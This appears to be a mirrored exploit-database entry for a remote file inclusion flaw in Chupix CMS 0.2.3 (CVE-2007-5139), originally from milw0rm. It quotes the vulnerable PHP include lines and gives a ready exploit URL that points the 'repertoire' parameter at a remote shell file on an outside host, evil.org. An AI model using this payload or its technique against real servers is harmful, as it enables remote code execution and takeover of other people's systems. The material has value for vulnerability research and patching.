[] NeoSense
E X P L O I T S
title author type platform port cve id

Chupix CMS 0.2.3 - 'repertoire' Remote File Inclusion

Author: 0in
type: webapps
platform: php
port: 
date_added: 2007-09-26 
date_updated: 2016-10-12 
verified: 1 
codes: OSVDB-38883;CVE-2007-5139 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comchupix_0.2.3.tar.gz
#chupix 0.2.3 /admin/include/header.php RFI
#f0und by 0in
#contact: 0in.email@gmail.com
#Greetings to:Die-angel,Slim,Joker186,Kaja,Artysta,wojto111,reydex
#team:Our Dark-Coders team;]
--------------------------------------------------------------------------------------------------------------------
#register_globals=On
BUG:
include($repertoire .'db/config/config.php');  // lecture de la configuration souhaitée par l'utilisateur
 include($repertoire .'include/template.php');             // classe de création des templates
 include($repertoire .'include/MyTxt.php');                // inclusion de la classe MyTxt
 $path_lang = $repertoire ."langues/". $conf__lang ."/admin.php";
 include($path_lang);                                      // Chargement du fichier de langues

EXPLOIT:
http://x.com/[patch]/admin/include/header.php?repertoire=http://evil.org/shell.txt ?
--------------------------------------------------------------------------------------------------------------------

# milw0rm.com [2007-09-27]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.